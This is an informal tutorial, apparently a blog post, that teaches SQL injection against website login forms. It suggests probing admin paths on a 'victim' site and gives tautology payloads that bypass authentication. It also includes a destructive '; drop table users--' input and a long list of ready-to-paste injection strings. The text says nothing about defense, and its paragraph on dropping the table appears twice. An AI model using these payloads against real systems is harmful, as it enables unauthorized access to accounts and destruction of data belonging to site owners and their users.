The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
There is two SQL injection attack types:
- Error Based Injections
- Blind Injection Attacks
But first of all you need to find an SQL bug. The easiest and fastest way to inserting SQL code in a database is trough the form. If you want to get superuser privilege on a system all you need to do is to skip an authorization. You can do this trough the login form on a website. Login form on a web site you can find in following links. For example:
Be creative. :)www.victim.com/adminwww.victim.com/administratorwww.victim.com/loginwww.victim.com/login.aspwww.victim.com/admin/admin.php .... etc
Login page SQL query - How it works
The easiest way for the login page to work is by building a database query that looks like this:
SELECT id FROM users WHERE username = '$user'
AND password = '$pass’
In a normal login when user inputs are username 'Admin' and password '1234' the query look like this.
SELECT id FROM users WHERE username = 'Admin'
AND password = '1234’
If the variables $user and $pass are requested directly from the user's input, this can easily be compromised. Suppose that we gave 'Admin' as a username and this something' or 'a'='a string as a password. The query will look like this.
SELECT id FROM users WHERE username = 'Admin'AND password = something' OR 'a'='a'
This will allow you to bypass authorization and give you a superuser privileges without knowing a password. If you type a query in the username field, you need to add "--" or "/*" at the end of the query. "--" and "/*" are commentary and each query, after these characters will become useless. You can also try to type another SQL statements in username or password fields.
You can also try many variations in username, password or both fields.
For example you can try type more advanced query '; drop table users-- in a username field. The 'users' table will be deleted. The '--' character sequence is the 'comment', and the ';' character denotes the end of one query and the beginning of another. The '--' at the end of the username field is required in order for this particular query to terminate without error.
'
or 1=1
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
You can also try many variations in username, password or both fields.
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
or 1=1--
1' or 1=1 --
a' or 'a'='a
a') or ('a'='a
a") or ("a"="a
For example you can try type more advanced query '; drop table users-- in a username field. The 'users' table will be deleted. The '--' character sequence is the 'comment', and the ';' character denotes the end of one query and the beginning of another. The '--' at the end of the username field is required in order for this particular query to terminate without error.
SELECT id FROM users WHERE username =''; drop table users--AND password = <= This will be comment
I hope that I have explained the basics about SQL injection attacks on login forms. Next time I will explain "Error Based SQL Injections".